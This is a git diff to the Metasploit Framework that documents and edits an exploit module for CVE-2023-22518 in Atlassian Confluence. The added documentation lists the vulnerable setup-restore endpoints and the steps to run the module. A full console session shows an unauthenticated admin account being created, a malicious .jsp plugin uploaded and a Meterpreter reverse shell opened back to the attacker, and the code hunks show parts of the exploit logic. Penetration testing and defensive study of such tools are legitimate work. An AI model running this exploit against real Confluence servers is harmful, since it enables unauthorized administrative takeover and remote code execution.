diff --git a/documentation/modules/exploit/multi/http/atlassian_confluence_unauth_backup.md b/documentation/modules/exploit/multi/http/atlassian_confluence_unauth_backup.md new file mode 100644 index 000000000000..764251322f50 --- /dev/null +++ b/documentation/modules/exploit/multi/http/atlassian_confluence_unauth_backup.md @@ -0,0 +1,108 @@ +## Vulnerable Application + +This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a +Confluence instance administrator account. Using this account, an attacker can then perform all +administrative actions that are available to Confluence instance administrator. This module uses the +administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code +execution on the target in the context of the of the user running the confluence server. + +### Setup +Download and install a [vulnerable version of Atlassian Confluence](https://www.atlassian.com/software/confluence/download.). +By default the server will listen for HTTP connections on port 8090. This exploit module was tested against Confluence +8.5.1 running on Windows Server 2022. + +After running the installer the setup wizard will ask for a trial license. An Atlassian account is free and required +to obtain the trial licence. A database and a will also be required to run Confluence. Download and install +[PostgreSQL](https://www.enterprisedb.com/downloads/postgres-postgresql-downloads). The setup Wizard will ask for DB +credentials, the default PostgreSQL database can be used. + +## Verification Steps + +1. Start msfconsole +1. Do: `use atlassian_confluence_unauth_backup` +1. Set the `RHOST` +1. Run the module +1. Receive a Meterpreter session in the context of the user running the Confluence application. + +## Options + +### CONFLUENCE_TARGET_ENDPOINT + +This is the endpoint used to trigger the vulnerability, and must be reachable by an un authenticated HTTP(S) POST +request. The three vulnerable endpoints outlined by Atlassian in the advisory for this vulnerability are as follows: + - /json/setup-restore.action + - /json/setup-restore-local.action + - /json/setup-restore-progress.action' + +### CONFLUENCE_PLUGIN_TIMEOUT + +The exploit will install a malicious plugin into the Confluence server. Plugin installation is performed asynchronously +and we must poll the server to find out when installation has completed. This option governs the maximum amount +of time to wait for installation to complete. The timeout value is in seconds and by default this option is set to `30`. + +## Scenarios +### Windows Server 2022 running Atlassian Confluence 8.5.1 +``` +msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set rhost 172.16.199.134 +rhost => 172.16.199.134 +msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > set verbose true +verbose => true +msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > options + +Module options (exploit/multi/http/atlassian_confluence_unauth_backup): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + CONFLUENCE_PLUGIN_TIMEOUT 30 yes The timeout (in seconds) to wait when installing a plugin + CONFLUENCE_TARGET_ENDPOINT /json/setup-restore.action yes The endpoint used to trigger the vulnerability. (Accepted: /json/setup-restore.action, /json/setup-restore-local.action, /json/setup-restore-progress.action) + NEW_PASSWORD LELTtnOG yes Password to be used when creating a new user with admin privileges + NEW_USERNAME candace.leffler yes Username to be used when creating a new user with admin privileges + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 172.16.199.134 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html + RPORT 8090 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + VHOST no HTTP server virtual host + + +Payload options (java/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 172.16.199.1 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Java + + + +View the full module info with the info, or info -d command. + +msf6 exploit(multi/http/atlassian_confluence_unauth_backup) > run + +[*] Started reverse TCP handler on 172.16.199.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.5.1 +[*] Setting credentials: candace.leffler:LELTtnOG +[+] Exploit Success! Login Using 'candace.leffler :: LELTtnOG' +[*] Generating payload plugin +[*] Uploading payload plugin +[*] Triggering payload plugin +[*] Deleting plugin... +[*] Sending stage (57692 bytes) to 172.16.199.134 +[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.134:50095) at 2023-12-11 18:52:33 -0500 + +meterpreter > getuid +Server username: WIN-2EEL7BRDUD8$ +meterpreter > sysinfo +Computer : WIN-2EEL7BRDUD8 +OS : Windows Server 2022 10.0 (amd64) +Architecture : x64 +System Language : en_US +Meterpreter : java/windows +meterpreter > +``` diff --git a/lib/msf/core/exploit/remote/http/atlassian/confluence/payload_plugin.rb b/lib/msf/core/exploit/remote/http/atlassian/confluence/payload_plugin.rb index b4d1106aa6f6..a2e9f97e1be9 100644 --- a/lib/msf/core/exploit/remote/http/atlassian/confluence/payload_plugin.rb +++ b/lib/msf/core/exploit/remote/http/atlassian/confluence/payload_plugin.rb @@ -123,7 +123,7 @@ def trigger_payload_plugin(payload_endpoint) end def delete_payload_plugin(plugin_key, payload_endpoint, admin_username, admin_password) - print_status('Deleting plugin...') + vprint_status('Deleting plugin...') res = send_request_cgi( 'method' => 'DELETE', diff --git a/modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb b/modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb index d1868cfebbc2..f3371baf395a 100644 --- a/modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb +++ b/modules/exploits/multi/http/atlassian_confluence_unauth_backup.rb @@ -16,13 +16,13 @@ def initialize(info = {}) super( update_info( info, - 'Name' => 'Atlassian Confluence Unauth JSON setup-restore RCE', + 'Name' => 'Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)', 'Description' => %q{ - This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a - Confluence instance administrator account. Using this account, an attacker can then perform all - administrative actions that are available to Confluence instance administrator. This module uses the - administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code - execution on the target in the context of the of the user running the confluence server. + This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a + Confluence instance administrator account. Using this account, an attacker can then perform all + administrative actions that are available to Confluence instance administrator. This module uses the + administrator account to install a malicious .jsp servlet plugin which the user can trigger to gain code + execution on the target in the context of the of the user running the confluence server. }, 'Author' => [ 'Atlassian', # Discovery @@ -58,7 +58,7 @@ def initialize(info = {}) OptString.new('NEW_USERNAME', [true, 'Username to be used when creating a new user with admin privileges', Faker::Internet.username], regex: /^[a-z._@]+$/), OptString.new('NEW_PASSWORD', [true, 'Password to be used when creating a new user with admin privileges', Rex::Text.rand_text_alpha(8)]), # The endpoint we target to trigger the vulnerability. - OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action','/json/setup-restore-local.action','/json/setup-restore-progress.action']]), + OptEnum.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', '/json/setup-restore.action', ['/json/setup-restore.action', '/json/setup-restore-local.action', '/json/setup-restore-progress.action']]), # We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait. OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30]) ] @@ -70,9 +70,9 @@ def check # Confluence Serer and Confluence Data Center have the same vulnerable version ranges. if confluence_version.between?(Rex::Version.new('1.0.0'), Rex::Version.new('7.19.15')) || - confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) || - confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) || - confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2')) + confluence_version.between?(Rex::Version.new('7.20.0'), Rex::Version.new('8.3.3')) || + confluence_version.between?(Rex::Version.new('8.4.0'), Rex::Version.new('8.4.3')) || + confluence_version.between?(Rex::Version.new('8.5.0'), Rex::Version.new('8.5.2')) return Exploit::CheckCode::Appears("Exploitable version of Confluence: #{confluence_version}") end @@ -123,7 +123,7 @@ def upload_backup 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'keep_cookies' => true, 'headers' => { - 'X-Atlassian-Token' => 'no-check', + 'X-Atlassian-Token' => 'no-check' }, 'vars_get' => { 'synchronous' => 'true' @@ -140,7 +140,7 @@ def exploit # Exploit CVE-2023-22518 by uploading a backup .zip file to confluence with an attacker defined username & password upload_backup - # Now with admin access, upload a .jsp plugin to gain RCE on the target system. + # Now with admin access, upload a .jsp plugin using the PayloadPlugin mixin to gain RCE on the target system. payload_endpoint = rand_text_alphanumeric(8) plugin_key = rand_text_alpha(8) begin